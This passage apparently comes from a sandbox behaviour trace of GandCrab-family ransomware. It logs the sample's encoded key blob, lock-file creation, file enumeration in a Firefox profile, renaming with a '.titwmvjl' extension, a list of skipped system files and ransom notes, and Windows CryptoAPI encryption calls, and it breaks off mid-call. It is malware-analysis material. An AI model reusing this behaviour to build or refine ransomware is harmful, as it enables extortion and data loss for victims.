\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0082.330] WriteFile (in: hFile=0x248, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e2fc, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e2fc*=0x2162, lpOverlapped=0x0) returned 1 [0082.330] CloseHandle (hObject=0x248) returned 1 [0082.331] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.331] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.331] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1b, wMilliseconds=0x280)) [0082.331] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.331] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.331] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.332] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock") returned 130 [0082.332] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x248 [0082.332] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.332] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\") returned 106 [0082.333] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*" [0082.333] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*", fInfoLevelId=0x1, lpFindFileData=0x259e318, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e318) returned 0x5033b8 [0082.333] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.333] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.333] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.333] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.333] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.333] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0082.333] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0082.333] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock" [0082.333] lstrlenW (lpString=".titwmvjl") returned 9 [0082.333] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock") returned 130 [0082.333] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.334] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 139 [0082.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\d2ca4a09d2ca4deb61a.lock") returned 130 [0082.334] lstrlenW (lpString=".lock") returned 5 [0082.334] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.334] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0082.334] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.335] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.335] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0082.335] lstrcmpW (lpString1="LICENSE.txt", lpString2=".") returned 1 [0082.335] lstrcmpW (lpString1="LICENSE.txt", lpString2="..") returned 1 [0082.335] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\", lpString2="LICENSE.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" [0082.335] lstrlenW (lpString=".titwmvjl") returned 9 [0082.335] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0082.335] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.335] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt.titwmvjl") returned 126 [0082.335] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0082.335] lstrlenW (lpString=".txt") returned 4 [0082.335] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.335] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.336] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.336] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0082.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="desktop.ini") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="autorun.inf") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ntuser.dat") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="iconcache.db") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="bootsect.bak") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="boot.ini") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ntuser.dat.log") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="thumbs.db") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="CRAB-DECRYPT.html") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="ntldr") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="NTDETECT.COM") returned -1 [0082.336] lstrcmpiW (lpString1="LICENSE.txt", lpString2="Bootfont.bin") returned 1 [0082.336] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt") returned 117 [0082.336] lstrlenW (lpString=".txt") returned 4 [0082.336] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.337] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".txt ") returned 5 [0082.337] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.337] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\LICENSE.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\license.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0082.338] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.338] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.338] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.341] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.342] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.342] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.342] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0082.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.342] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.342] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.342] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.342] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.346] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.346] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.346] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.346] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0082.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.346] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.346] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.347] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.350] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.351] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5032f8) returned 1 [0082.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.351] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.351] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, 